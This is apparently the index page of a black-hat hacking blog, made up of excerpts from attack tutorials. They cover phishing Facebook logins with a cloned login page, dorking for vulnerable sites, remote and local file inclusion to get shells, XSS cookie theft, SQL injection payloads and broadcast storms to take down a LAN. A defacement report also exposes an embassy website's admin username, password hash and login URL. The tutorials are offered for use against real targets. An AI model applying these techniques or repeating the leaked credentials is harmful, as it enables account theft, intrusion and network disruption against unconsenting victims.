What is a trojan/worm/virus/logic bomb?

Trojan: Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, its called a 'bug' or, in some cases, a feature Some virus scanning programs detect some trojans. Some virus scanning programs don't detect any trojans. No virus scanners detect all trojans. Virus: A virus is an independent program which reproduces itself. It may attach to other programs, it may create...

Read more »

How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id

Now im gonna make a step by step tutorial for facebook accounts. WITH PICTURES!!! ONE!: go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad. TWO!: Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. you should find this The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on...

Read more »

How to search Vulnerable site

1-) First go to http://www.google.com 2-) Press on the right, next to the textfield, on "Advanced Search". 3-) Fill in your dork at "This exact wording or phrase".     Results per page: 100 results (Or less depending on your internet speed.)     Language: Could be all languages or one language. I choose Dutch because I'm Dutch myself and I got a Dutch ISP so those sites will load faster.     Where your keywords show up: "in the URL of the page" 4-) Press search. 5-) Now we get this: 6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab. 7-) Open the tabs and add as example a single quote behind the link. 8-) If it's...

Read more »

Apple Website Hacked by HodLuM

One of the Apple Sub-Domain claimed to be Defaced By HodLuM as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "N00BZ" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster Website was also got hacked by HODLUM some months befo...

Read more »

RFI - Remote File Inclusion.

Today I will be teaching you guys RFI (Remote File Inclusion). What is RFI? RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites, many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion is exactly what it's name is. You include a file onto the website remotely. What makes a page vulnerable? A PHP include script looks like this. Code: <?php include($_GET['p'] ?> Since the code uses 'p' the syntax would be: Code: http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt? If the script looks like this: Code: <?php include($_GET['lulz']); ?>...

Read more »

XSS - Cross Site Scripting.

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it. What is XSS, what can I accomplish with it? XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later. Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website. What causes the vulnerability? Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the...

Read more »

LFI (Local File Inclusion)

1 – Introduction In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial. 2 – Finding LFI - Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it. Code:www.website.com/view.php?page=contact.php - Now lets replace contact.php with ../ so the URL will becomeCode:www.website.com/view.php?page=../ and we got an errorCode:Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 big chances to have a Local File Inclusion vulnerability.Let’s go to next step. - Now lets check for etc/passwd to see the if is Local File Inclusion...

Read more »

Complete SQL Injection Tutorial

Introduction:Hello every one .I am going to share with one of the best of my tutorials here . Now Let's begin!! Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin. Things you should know :Data is in the columns and the columns are in tables and the tables are in the database .Just remember that so you understand the rest . PART 1Bypassing admin log inGaining auth bypass on an admin account. Most sites vulnerable...

Read more »

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts (A Black Hat Team). They hacked into the database of the website and exposed sensitive information like admin details and many more. Website:- http://www.indianembassy.org.np/ user_name:- indianembassypassword:- 147f9d55b079a76d6ec6f36b61f4cf1a full_name:-  Administrator          Login Link:- http://www.indianembassy.org.np/admin/login.php  Ambassador Name:-   Jayant Prasad      Amb_id :- 21  Last Modification:- 2011-08-27    ...

Read more »

Creating Broadcast storms to take down a switched Network?

I am willing to Take down a LAN Network with Broadcast storms, Before that here is the topology of our overall Network Please have a look at the following image which will represent The network set-up i am talking, Code: http://i54.tinypic.com/a32fzn.png (As the image is large ,I am placing this in code instead of [IMG] tags) And here is the Information about our LAN   Total sub-nets-4 clients-90% of them running windows xp-sp2 and rest running windows 7 and vista. Servers-each sub-net has a DC i.e server,they are running windows 2003 OS. Main-server-i.e the 1 that is providing internet access to rest of the clients and other servers in sub-net 1,2,3,4 running red-hat linux. And switches used in our networks are un-managed one and our network...

Read more »

Scanning with Nessus

[-- Intro --] Welcome to the Nessus scanning quick guide. In this guide I'll show you blackhats how to use Tenable Nessus to scan websites // IP's for vulnerabilities. For this guide I'll be using http://sugarmegs.org/ [-- Installing Nessus --] For this tutorial I'll be using a Windows 7 machine, instead of my normal Linux, because the free version works a lot better on Windows. Now to the actual installing part. Step one, obtaining Nessus. To download Nessus, visit http://www.nessus.org/download/ and download it. Then install it like you'd install any other program. [-- Setting up --] Now to set up your Nessus server. Open the Nessus Server Manager that should be on your desktop(If its not look on C:\Program Files\Tenable\Nessus for it) Once you have that open,...

Read more »

Mini Password Buffer Overflow Tut

Password Form Buffer Overflows In this Lesson we will be learning how to do a Login/Password Form Buffer Overflow. This is a very basic version of a Buffer Overflow but just as effective. Basically what is happening here is that Password Forms usually have a limit on the number of Characters they are aloud input, but we will bypass this limit overloading the login and getting access to the Server! To do this we will need a tool call WebDeveloper for Firefox, which you can download here This is a very simple Hack so it only works on some Basic Authentication Logins, but its good know for the future if you find any!   So on firefox Go Tools>Web Developer>Forms>Remove Maximum Lengths Now type in a massively long code eg "aaaaaaaaaaaaaaaaaaaaaaaaa" and so on, and it...

Read more »

Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website: Code: site.com/index.php?id=1 To find out if it's vulnerable we will undergo a little test. For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2. Therefore we will compare these two websites: Code: site.com/index.php?id=1 and 1=1 and site.com/index.php?id=1 and 1=2 If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable. However, if they both load without missing content, it is not vulnerable. Step 2 Finding The Mysql Version This isn't very much of use in this kind of injection, but it might be useful. To find it out, you'll...

Read more »

Hacking - Start to finish (quick list)

Hello, this little post will explain in rough details how you start hacking a specific target. First. There are  many different ways going about this, but this is one way. Information gathering The first thing you want to do when targeting a specific target is get as much information as possible before a front attack(if any, being quiet is much better) Now this step can take ages if you really want a detailed level of knowledge. And if you are serious about hacking your target, you should be detailed here. What sort of information do I look for you might ask yourself? Well, anything really. Anything surrounding the target and even things that surround things that surround your target. Here is a short list of things...

Read more »